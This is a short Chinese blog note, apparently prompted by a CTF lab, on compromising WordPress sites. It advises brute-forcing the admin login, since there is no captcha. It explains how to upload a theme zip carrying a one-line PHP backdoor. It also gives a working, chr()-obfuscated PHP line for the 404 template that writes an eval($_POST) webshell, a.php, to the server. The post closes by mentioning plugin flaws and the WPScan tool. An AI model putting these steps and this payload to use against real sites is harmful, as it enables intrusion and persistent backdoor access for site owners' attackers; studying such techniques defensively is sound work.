Worldpress 相關利用

worldpress是一款主流的博客系統,但是關於它的漏洞也層出不窮。
這次是因爲一次CTF靶場遇到此類情況,順便做個簡單記錄。

worldpress系統本身比較安全,但是因爲它可以自定義插件,很多時候因爲插件作者安全開發的能力有高有低,導致許多安全漏洞的出現。

0x01 弱口令

後臺默認地址爲:xxxx/wp-admin/

沒有驗證碼可以暴力破解,常見用戶名admin,worldpress,system等。

進入後臺後的利用:

1 上傳主題包getshell

本機建立目錄“upkn”,把一句話1.php放進去。打包upkn目錄爲zip文件。WP後臺的主題管理,上傳主題,安裝。則你的後門路徑爲:
wp-content/themes/upkn/1.php。

2 修改主題文件

“外觀”-“編輯”-“404模板
<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件頭
點404模板的時候地址欄有相對路徑,默認是wp-content/themes/twentyten/404.php
更新完直接訪問localhost/wp-content/themes/twentyten/404.php就會在twentyten目錄生成一句話後門a.php 密碼a

0x02 插件漏洞利用

插件漏洞類型很多,例如xss,sql注入,rce等

推薦工具方便自查:https://github.com/wpscanteam/wpscan

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章